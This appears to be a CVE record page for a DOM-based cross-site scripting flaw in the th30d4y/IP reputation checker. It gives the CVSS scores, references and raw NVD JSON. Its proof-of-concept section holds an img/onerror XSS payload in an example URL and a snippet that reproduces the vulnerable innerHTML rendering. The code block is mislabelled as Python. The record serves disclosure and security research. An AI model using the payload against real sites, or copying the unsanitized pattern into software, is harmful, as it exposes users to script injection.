CVE-2026-41575

Description

In th30d4y/IP from version 1.0.1 to before version 2.0.1, a DOM-Based Cross-Site Scripting (XSS) vulnerability was identified in an IP Reputation Checker application. Unsanitized user input was directly rendered in the browser, allowing attackers to execute arbitrary JavaScript. This issue has been patched in version 2.0.1.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

th30d4y/IP >= 1.0.1, < 2.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for CVE-2026-41575 -->
<!-- The application takes an IP address from the URL and renders it via innerHTML -->

<!-- Malicious URL Example -->
<!-- https://target-site/checker?ip=<img src=x onerror=alert('XSS')> -->

<script>
    // Simulating the vulnerable behavior in th30d4y/IP
    function checkIP() {
        // Get user input from URL parameter
        const urlParams = new URLSearchParams(window.location.search);
        let ip = urlParams.get('ip');

        if (ip) {
            // VULNERABLE CODE: Unsanitized input directly inserted into DOM
            document.getElementById('ip-display').innerHTML = "Scanning IP: " + ip;
        } else {
            document.getElementById('ip-display').innerText = "No IP provided";
        }
    }

    // Execute the function to demonstrate the vulnerability
    checkIP();
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41575
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41575
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41575/
[4] VulDB https://vuldb.com/cve/CVE-2026-41575
[5] https://github.com/th30d4y/IP/security/advisories/GHSA-j7wv-7j97-9qh9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41575", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:40.740", "lastModified": "2026-05-08T16:08:15.570", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In th30d4y/IP from version 1.0.1 to before version 2.0.1, a DOM-Based Cross-Site Scripting (XSS) vulnerability was identified in an IP Reputation Checker application. Unsanitized user input was directly rendered in the browser, allowing attackers to execute arbitrary JavaScript. This issue has been patched in version 2.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://github.com/th30d4y/IP/security/advisories/GHSA-j7wv-7j97-9qh9", "source": "[email protected]"}]}}